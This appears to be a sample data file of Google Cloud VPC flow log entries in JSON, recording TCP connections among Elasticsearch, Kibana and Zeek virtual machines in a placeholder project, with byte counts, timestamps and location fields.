-{"insertId":"1gq7q7afe373ei","jsonPayload":{"bytes_sent":"13440","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33970},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"96","reporter":"DEST","rtt_msec":"308","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470006631Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373ez","jsonPayload":{"bytes_sent":"368131","connection":{"dest_ip":"203.0.113.134","dest_port":33966,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:50.800931420Z","packets_sent":"76","reporter":"SRC","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510698570Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373fh","jsonPayload":{"bytes_sent":"66258","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"365","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150282980Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373es","jsonPayload":{"bytes_sent":"76976","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65276},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220621567Z","packets_sent":"749","reporter":"DEST","rtt_msec":"156","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760349279Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373fu","jsonPayload":{"bytes_sent":"72967","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65319},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220617595Z","packets_sent":"747","reporter":"DEST","rtt_msec":"62","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.740597880Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373f2","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":50364},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:08.797851544Z","packets_sent":"9","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:08.412738626Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373ee","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"203.0.113.27","dest_port":50364,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:08.797851544Z","packets_sent":"8","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.412738626Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373ey","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":33126},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:50.919744677Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:50.809605761Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373e7","jsonPayload":{"bytes_sent":"73215","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65318},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"747","reporter":"DEST","rtt_msec":"96","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760345858Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373f8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.12","dest_port":53096,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:20.813699795Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:20.700692281Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373ec","jsonPayload":{"bytes_sent":"176465","connection":{"dest_ip":"10.87.40.76","dest_port":33570,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"65","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466779642Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373f5","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"203.0.113.27","dest_port":33126,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:50.919744677Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:50.809605761Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373f6","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":56478},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:20.566586739Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:20.450631492Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373fo","jsonPayload":{"bytes_sent":"32764","connection":{"dest_ip":"198.51.100.88","dest_port":52430,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:53.081386115Z","packets_sent":"228","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:07.968717244Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373ek","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.27","dest_port":34536,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:51.162931667Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:51.050074134Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373fj","jsonPayload":{"bytes_sent":"137855","connection":{"dest_ip":"10.87.40.76","dest_port":33572,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"72","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466742414Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373fm","jsonPayload":{"bytes_sent":"125197","connection":{"dest_ip":"10.87.40.76","dest_port":33540,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"242","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373eg","jsonPayload":{"bytes_sent":"917832","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"198.51.100.88","src_port":53096},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.219496168Z","packets_sent":"230","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.853096315Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373fc","jsonPayload":{"bytes_sent":"55572","connection":{"dest_ip":"198.51.100.88","dest_port":53096,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.219496168Z","packets_sent":"133","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.853096315Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373eq","jsonPayload":{"bytes_sent":"4615","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33966},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821049800Z","packets_sent":"75","reporter":"DEST","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510698570Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373ev","jsonPayload":{"bytes_sent":"75612","connection":{"dest_ip":"203.0.113.58","dest_port":65318,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"583","reporter":"SRC","rtt_msec":"96","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760345858Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373em","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":34536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:51.162931667Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:51.050074134Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373ew","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"198.51.100.107","dest_port":56478,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:20.566586739Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:20.450631492Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373e9","jsonPayload":{"bytes_sent":"64140","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33694},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"371","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566359759Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373f9","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":53096},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:20.813699795Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:20.700692281Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373f1","jsonPayload":{"bytes_sent":"231764","connection":{"dest_ip":"10.87.40.76","dest_port":33694,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"251","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566359759Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373ff","jsonPayload":{"bytes_sent":"107878","connection":{"dest_ip":"203.0.113.58","dest_port":65276,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220621567Z","packets_sent":"614","reporter":"SRC","rtt_msec":"156","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760349279Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373fq","jsonPayload":{"bytes_sent":"595838","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"198.51.100.88","src_port":52430},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:53.081386115Z","packets_sent":"299","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:07.968717244Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"14iipwlfd8t01n","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"198.51.100.107","dest_port":56410,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:10.630345069Z","packets_sent":"7","reporter":"SRC","rtt_msec":"37","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:10.514594429Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 